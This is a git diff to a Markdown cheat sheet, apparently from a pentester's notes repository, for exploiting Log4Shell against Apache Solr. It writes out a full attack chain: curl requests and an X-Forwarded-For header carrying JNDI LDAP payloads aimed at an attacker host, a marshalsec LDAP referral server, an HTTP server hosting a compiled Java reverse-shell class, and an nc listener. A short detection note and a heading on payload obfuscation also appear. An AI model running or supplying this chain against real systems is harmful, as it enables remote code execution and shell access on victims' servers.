typos

exploit/java/log4shell.md

@@ -20,23 +20,19 @@ ${java:version}
 
 ## POC
 ```sh
-curl 'http://<target-IP>:8983/solr/admin/cores?foo=?$\{jndi:ldap://<attacker-IP>:4449\}'
+curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449\}'
+```
+* Use HTTP header field as storage for payload or any other possible input field
+```HTTP
+X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo}
 ```
 
 ## Usage
 
-* Fuzz endpoints to applicate the exploit
+* Fuzz endpoints to applicate the exploit on
-* Use HTTP header field as storage for payload as well as any other possible input field 
-```HTTP
-X-Forwarded-For: ${jndi:ldap://<attacker-IP>:1389/foo}
-```
-
 * Clone and build [marshallsec](https://github.com/mbechler/marshalsec) via `mvn clean package -DskipTests`
 * Java version should be the same as the one on the target
-* Redirect LDAP server to HTTP server
+* A Proxy LDAP server to an HTTP server is needed
-```sh
-java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
-```
 
 * Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
 ```sh
@@ -50,9 +46,18 @@ public class Exploit {
     }
 }
 ```
-* Open reverse shell on `4449`
+* Run the LDAP, HTTP and reverse shell
-* `curl 'http://.10.43.243:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'`
+```sh
+java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
+```
+```sh
+php -S 0.0.0.:8000
+```
+```sh
+nc -lvnp 4449
+```
 
+* Trigger via `curl 'http://$TARGET:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'`
 
 ## Detection
 
@@ -63,7 +68,7 @@ public class Exploit {
 
 * Parse logs for `jndi`
 
-## Bypasses 
+## Obfuscation 
 
 * Possible bypasses are as follows
 ```sh